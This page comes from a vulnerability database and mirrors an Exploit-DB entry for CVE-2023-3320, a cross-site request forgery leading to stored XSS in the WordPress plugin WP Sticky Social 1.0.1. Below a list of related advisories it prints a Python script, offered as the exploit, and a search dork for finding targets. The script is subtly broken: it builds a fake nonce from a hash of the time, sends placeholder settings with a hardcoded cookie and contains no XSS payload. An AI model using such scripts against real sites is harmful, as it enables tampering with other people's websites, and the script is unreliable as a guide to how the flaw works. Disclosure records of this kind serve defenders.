Lucene search
K

WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

🗓️ 20 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 243 Views

WP Sticky Social 1.0.1 Cross-Site Request Forger

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting Exploit
26 Jun 202300:00
zdt
ATTACKERKB
CVE-2023-3320
20 Jun 202303:15
attackerkb
Circl
CVE-2023-3320
20 Jun 202307:59
circl
CNNVD
WordPress Plugin WP Sticky Social 跨站请求伪造漏洞
20 Jun 202300:00
cnnvd
CVE
CVE-2023-3320
20 Jun 202302:52
cve
Cvelist
CVE-2023-3320
20 Jun 202302:52
cvelist
EUVD
EUVD-2023-43988
3 Oct 202520:07
euvd
NVD
CVE-2023-3320
20 Jun 202303:15
nvd
OSV
CVE-2023-3320
20 Jun 202303:15
osv
Packet Storm
WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting
21 Jun 202300:00
packetstorm
Rows per page
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
#  Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jun 2023 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.16.1 - 8.8
EPSS0.01226
SSVC
243